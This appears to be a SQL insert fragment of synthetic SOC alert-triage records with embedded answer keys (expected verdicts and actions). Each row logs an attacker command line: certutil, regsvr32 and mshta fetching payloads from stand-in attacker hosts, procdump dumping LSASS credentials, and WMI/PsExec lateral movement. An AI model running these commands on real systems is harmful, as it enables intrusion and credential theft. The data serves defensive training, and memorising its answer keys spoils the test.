(2095, 'WMI Lateral Movement Detected Across Domain', 'high', 'Carbon Black', 'An attacker used WMI for lateral movement within the network, targeting multiple devices to execute remote commands.', 'Lateral Movement', 'T1047', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:05:30Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.2.5\",\"dst_ip\":\"10.0.2.35\",\"username\":\"network_admin\",\"hostname\":\"central_server\",\"command_line\":\"wmic /node:10.0.2.35 process call create \'cmd.exe /c whoami\'\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.2.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Source IP used for internal lateral movement\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"wmic /node:10.0.2.35 process call create \'cmd.exe /c whoami\'\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"WMI command execution used for lateral movement\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"WMI was used to execute commands on a remote host, indicating lateral movement.\"}', 'Advanced', 'EDR', 7, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(2096, 'Certutil Abuse for Malicious Payload Download Detected', 'critical', 'Sysmon', 'Certutil was used to download a malicious payload from an external source, likely for establishing persistence or further compromise.', 'Malware', 'T1140', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:47:22Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.3.8\",\"dst_ip\":\"198.51.100.25\",\"username\":\"user_john\",\"hostname\":\"client02\",\"command_line\":\"certutil.exe -urlcache -split -f http://malicious-site.com/payload.exe payload.exe\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple malware distribution activities\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"certutil.exe -urlcache -split -f http://malicious-site.com/payload.exe payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Certutil abuse for downloading malicious files\"}}],\"expected_actions\":[\"block_ip\",\"block_hash\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Certutil was leveraged to download a known malicious payload, indicating an attempt to bypass security measures.\"}', 'Advanced', 'EDR', 7, 1, 'RETAIL', NULL, NULL, NULL, 0),
(2097, 'MSHTA Exploitation for Remote Code Execution Identified', 'high', 'CrowdStrike', 'MSHTA was used to execute a remote script, which can be indicative of an attempt to execute code or download additional malicious payloads.', 'Malware', 'T1218', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T12:15:10Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.4.1\",\"dst_ip\":\"203.0.113.50\",\"username\":\"jdoe\",\"hostname\":\"laptop01\",\"command_line\":\"mshta http://exploit-site.com/exploit.html\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP linked to known malicious activity and exploit distribution\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"mshta http://exploit-site.com/exploit.html\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"MSHTA used to execute remote code, common in fileless malware attacks\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"MSHTA is often used in fileless attacks to execute scripts from remote sources, posing a high security risk.\"}', 'Advanced', 'EDR', 7, 1, 'GOVERNMENT', NULL, NULL, NULL, 0),
(2098, 'Fileless Malware Detected via PowerShell Encoded Command', 'critical', 'CrowdStrike', 'A fileless malware attack was detected using an encoded PowerShell command executed on a compromised host. The attacker attempted to dump credentials from LSASS.', 'Malware', 'T1059.001', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:45:12Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.1.15\",\"dst_ip\":\"\",\"username\":\"jdoe\",\"hostname\":\"CORP-PC-01\",\"command_line\":\"powershell.exe -enc W3BhdGggdG8gc3VjY2Vzcw==\",\"file_hash\":\"7d1f3b4b7f5d4c3b8d3f2e5a6f7b8c9d\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"powershell.exe -enc W3BhdGggdG8gc3VjY2Vzcw==\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell commands are often used in fileless malware attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"7d1f3b4b7f5d4c3b8d3f2e5a6f7b8c9d\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Associated with multiple malware campaigns.\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The encoded PowerShell command suggests a fileless malware attack aimed at credential dumping.\"}', 'Advanced', 'EDR', 7, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2099, 'Suspicious Lateral Movement via WMI Execution', 'high', 'SentinelOne', 'Detected WMI execution from one internal host to another, indicating potential lateral movement. The command was executed without a legitimate business need.', 'Lateral Movement', 'T1047', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T13:22:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"192.168.1.20\",\"username\":\"admin\",\"hostname\":\"SERVER-01\",\"command_line\":\"wmic /node:192.168.1.20 process call create \\\"cmd.exe /c whoami\\\"\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Source internal IP of WMI execution.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Destination internal IP of WMI execution.\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"wmic /node:192.168.1.20 process call create \\\"cmd.exe /c whoami\\\"\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Indicates potential lateral movement activity.\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"Unusual WMI activity suggests an attempt to move laterally within the network.\"}', 'Advanced', 'EDR', 7, 1, 'TECH', NULL, NULL, NULL, 0),
(2100, 'Credential Dumping Detected from LSASS Process', 'critical', 'Carbon Black', 'A process attempting to access LSASS memory was detected, indicative of credential dumping activity.', 'Credential Dumping', 'T1003', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T12:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.30\",\"dst_ip\":\"\",\"username\":\"svc_account\",\"hostname\":\"WORKSTATION-05\",\"command_line\":\"procdump64.exe -ma lsass.exe C:\\\\temp\\\\lsass.dmp\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"procdump64.exe -ma lsass.exe C:\\\\temp\\\\lsass.dmp\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"Procdump used for credential dumping detected.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.30\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host.\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The use of procdump to dump LSASS memory is a clear indicator of credential theft.\"}', 'Advanced', 'EDR', 7, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(2101, 'Suspicious Network Activity with CertUtil LOLBin', 'high', 'Sysmon', 'Detected suspicious use of CertUtil to download a potentially malicious file from an external server, indicative of a living-off-the-land attack.', 'Malware', 'T1218.010', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:05:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.2.25\",\"dst_ip\":\"203.0.113.45\",\"username\":\"user123\",\"hostname\":\"CLIENT-PC-09\",\"command_line\":\"certutil.exe -urlcache -split -f http://malicious.example.com/file.exe C:\\\\temp\\\\file.exe\",\"domain\":\"malicious.example.com\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"domain\",\"value\":\"malicious.example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Domain associated with malware distribution.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for malware distribution.\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"certutil.exe -urlcache -split -f http://malicious.example.com/file.exe C:\\\\temp\\\\file.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"CertUtil used for malicious file download detected.\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The use of CertUtil to download files from a known malicious domain indicates a potential malware infection attempt.\"}', 'Advanced', 'EDR', 7, 1, 'RETAIL', NULL, NULL, NULL, 0),
(2102, 'Lateral Movement Attempt via PsExec Tool', 'high', 'Carbon Black', 'PsExec was used to execute a command on a remote host, indicating potential lateral movement within the network.', 'Lateral Movement', 'T1569.002', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:20:30Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.45\",\"dst_ip\":\"10.0.0.50\",\"username\":\"admin_user\",\"hostname\":\"ADMIN-PC-01\",\"command_line\":\"psexec.exe \\\\\\\\10.0.0.50 -u domain\\\\admin_user cmd.exe /c \\\"dir C:\\\\\\\"\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal source IP for PsExec execution.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal target IP for PsExec execution.\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"psexec.exe \\\\\\\\10.0.0.50 -u domain\\\\admin_user cmd.exe /c \\\"dir C:\\\\\\\"\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"PsExec used for unauthorized command execution on remote host.\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"PsExec usage without a legitimate reason suggests an attempt to move laterally and execute commands on remote hosts.\"}', 'Advanced', 'EDR', 7, 1, 'ENERGY', NULL, NULL, NULL, 0),
(2103, 'Sophisticated Fileless Malware Detected via Encoded PowerShell', 'critical', 'CrowdStrike', 'A fileless malware attack was detected using an encoded PowerShell command. The attacker utilized PowerShell to execute commands directly in memory, avoiding traditional file-based detection.', 'Malware', 'T1059.001', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:45:23Z\",\"event_type\":\"process_execution\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"10.0.5.25\",\"username\":\"jdoe\",\"hostname\":\"CORP-SERVER01\",\"command_line\":\"powershell.exe -enc aGVsbG8gd29ybGQ=\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported for multiple malware attacks\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell.exe -enc aGVsbG8gd29ybGQ=\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command used for fileless malware\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Encoded PowerShell command indicates an attempt to execute fileless malware, consistent with recent attack patterns.\"}', 'Advanced', 'EDR', 7, 1, 'TECH', NULL, NULL, NULL, 0),
(2104, 'Credential Dumping from LSASS Detected', 'high', 'SentinelOne', 'An attempt to dump credentials from the LSASS process was detected, indicating possible credential theft and lateral movement preparation.', 'Credential Attack', 'T1003.001', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T12:22:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.100\",\"dst_ip\":\"192.168.1.10\",\"username\":\"admin\",\"hostname\":\"FINANCE-PC01\",\"command_line\":\"rundll32.exe dump_lsass.dll,Dump\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal network IP\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"rundll32.exe dump_lsass.dll,Dump\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command associated with credential dumping\"}}],\"expected_actions\":[\"reset_credentials\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The command to dump LSASS memory was executed, indicating an attempt to extract stored credentials.\"}', 'Advanced', 'EDR', 7, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2105, 'Lateral Movement via WMI Detected', 'high', 'Carbon Black', 'Suspicious internal WMI activity was detected, suggesting an attacker attempting lateral movement across the network.', 'Lateral Movement', 'T1047', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:03:59Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.55\",\"dst_ip\":\"10.0.0.60\",\"username\":\"hacker\",\"hostname\":\"HR-WORKSTATION\",\"command_line\":\"wmic process call create \'cmd.exe /c whoami\'\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.55\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal network IP\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"wmic process call create \'cmd.exe /c whoami\'\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Use of WMI for lateral movement\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The use of WMI for executing commands on another host is indicative of lateral movement.\"}', 'Advanced', 'EDR', 7, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(2106, 'Malicious Use of LOLBins Detected with Regsvr32', 'critical', 'Sysmon', 'An attacker used regsvr32 to execute a remote script, indicating a potentially sophisticated attack leveraging LOLBins.', 'Malware', 'T1218.011', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T15:11:12Z\",\"event_type\":\"process_execution\",\"src_ip\":\"198.51.100.25\",\"dst_ip\":\"10.0.0.15\",\"username\":\"malicious_user\",\"hostname\":\"ENGINEERING-PC\",\"command_line\":\"regsvr32.exe /s /n /u /i:https://malicious.example.com/script.sct scrobj.dll\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple malware campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"regsvr32.exe /s /n /u /i:https://malicious.example.com/script.sct scrobj.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Regsvr32 used to bypass security controls by executing a remote script\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The use of regsvr32 to execute a remote script suggests a sophisticated attack leveraging living-off-the-land binaries.\"}', 'Advanced', 'EDR', 7, 1, 'ENERGY', NULL, NULL, NULL, 0),
(2107, 'Unauthorized Internal WMI Execution Detected', 'high', 'Carbon Black', 'Unauthorized WMI commands were executed internally, possibly indicating an attempt for lateral movement within the network.', 'Lateral Movement', 'T1047', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T16:55:32Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.2.45\",\"dst_ip\":\"10.0.2.50\",\"username\":\"unauthorized_user\",\"hostname\":\"RESEARCH-LAPTOP\",\"command_line\":\"wmic /node:10.0.2.50 process call create \'powershell -enc aGVsbG8gd29ybGQ=\'\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.2.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal network IP\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"wmic /node:10.0.2.50 process call create \'powershell -enc aGVsbG8gd29ybGQ=\'\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command via WMI for lateral movement\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"Execution of encoded PowerShell commands via WMI indicates malicious lateral movement activity.\"}', 'Advanced', 'EDR', 7, 1, 'GOVERNMENT', NULL, NULL, NULL, 0),
(2108, 'Suspicious PowerShell Execution Detected on Internal Network', 'critical', 'CrowdStrike', 'A PowerShell script with encoded commands was executed from an internal host, indicating possible fileless malware activity. This script is known for credential dumping attempts.', 'Malware', 'T1059.001', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T03:15:30Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"192.168.1.20\",\"username\":\"jdoe\",\"hostname\":\"INTERNAL-PC\",\"command_line\":\"powershell.exe -enc W3Bhc3N3b3JkXQ==\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address associated with suspicious activity\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell.exe -enc W3Bhc3N3b3JkXQ==\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command used for credential dumping\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The encoded PowerShell command is indicative of credential dumping activity, a common fileless malware tactic.\"}', 'Advanced', 'EDR', 7, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2109, 'Lateral Movement Detected via WMI Execution', 'high', 'SentinelOne', 'A WMI command was executed from one internal host to another, indicating potential lateral movement within the network.', 'Lateral Movement', 'T1047', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T05:45:20Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.5\",\"dst_ip\":\"10.0.0.6\",\"username\":\"admin\",\"hostname\":\"SERVER-01\",\"command_line\":\"wmic /node:10.0.0.6 process call create \\\"cmd.exe /c whoami\\\"\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Source internal IP address used for WMI command\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"wmic /node:10.0.0.6 process call create \\\"cmd.exe /c whoami\\\"\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"WMI execution for lateral movement detected\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"WMI usage for executing commands on another host is a common technique used in lateral movement.\"}', 'Advanced', 'EDR', 7, 1, 'TECH', NULL, NULL, NULL, 0),
(2110, 'Credential Dumping Attempt via LSASS Memory Access', 'critical', 'Carbon Black', 'Suspicious access to LSASS memory detected, potentially aimed at credential dumping using living-off-the-land techniques.', 'Credential Attack', 'T1003', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:10:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"192.168.1.25\",\"username\":\"svc_account\",\"hostname\":\"CORP-SERVER\",\"command_line\":\"procdump.exe -ma lsass.exe C:\\\\temp\\\\lsass.dmp\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address associated with LSASS memory access\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"procdump.exe -ma lsass.exe C:\\\\temp\\\\lsass.dmp\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Command used for dumping LSASS memory\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"Dumping LSASS memory is a known technique for extracting credentials from Windows systems.\"}', 'Advanced', 'EDR', 7, 1, 'ENERGY', NULL, NULL, NULL, 0),
(2111, 'Fileless Malware Execution via LOLBin - CertUtil', 'high', 'Sysmon', 'CertUtil.exe was used to download and execute a malicious payload, indicating a possible fileless malware attack using living-off-the-land techniques.', 'Malware', 'T1218.010', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:30:55Z\",\"event_type\":\"process_execution\",\"src_ip\":\"172.16.0.2\",\"dst_ip\":\"external.attacker.com\",\"username\":\"user123\",\"hostname\":\"WORKSTATION-02\",\"command_line\":\"certutil.exe -urlcache -split -f http://external.attacker.com/malware.exe C:\\\\Users\\\\user123\\\\malware.exe\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"172.16.0.2\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address involved in suspicious activity\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"external.attacker.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"Domain associated with known malware distribution\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"certutil.exe -urlcache -split -f http://external.attacker.com/malware.exe C:\\\\Users\\\\user123\\\\malware.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"CertUtil used for downloading and executing malware\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"CertUtil is a known LOLBin used for downloading and executing malware without writing to disk.\"}', 'Advanced', 'EDR', 7, 1, 'GOVERNMENT', NULL, NULL, NULL, 0),
(2112, 'Regsvr32 Usage for Malicious Script Execution', 'critical', 'CrowdStrike', 'Regsvr32 was used to execute a remotely hosted script, indicating a possible fileless malware attack utilizing LOLBins.', 'Malware', 'T1218.011', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T12:00:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.2.50\",\"dst_ip\":\"203.0.113.100\",\"username\":\"malicious_user\",\"hostname\":\"TARGET-01\",\"command_line\":\"regsvr32.exe /s /n /u /i:http://malicious.site/script.sct scrobj.dll\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address executing suspicious commands\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"http://malicious.site/script.sct\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Known malicious domain hosting scripts\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"regsvr32.exe /s /n /u /i:http://malicious.site/script.sct scrobj.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Regsvr32 used to execute remote script\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Regsvr32 is a LOLBin that can be used to execute remote scripts without writing them to disk.\"}', 'Advanced', 'EDR', 7, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(2113, 'Fileless Malware Detected via PowerShell Execution', 'critical', 'CrowdStrike', 'PowerShell executed with encoded payload, indicative of fileless malware. Credential dumping activity detected shortly after.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T02:34:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"10.10.10.20\",\"username\":\"jdoe\",\"hostname\":\"DESKTOP-1A2B3C\",\"command_line\":\"powershell -enc W2J5dGVbXS5BZGQoW0NvbnZlcnQpJzEnLCdzJyk=\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address indicating a compromised host\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell -enc W2J5dGVbXS5BZGQoW0NvbnZlcnQpJzEnLCdzJyk=\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"PowerShell command with encoded payload linked to fileless malware\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Encoded PowerShell commands are a common indicator of fileless malware.\"}', 'Advanced', 'EDR', 7, 1, 'TECH', NULL, NULL, NULL, 0),
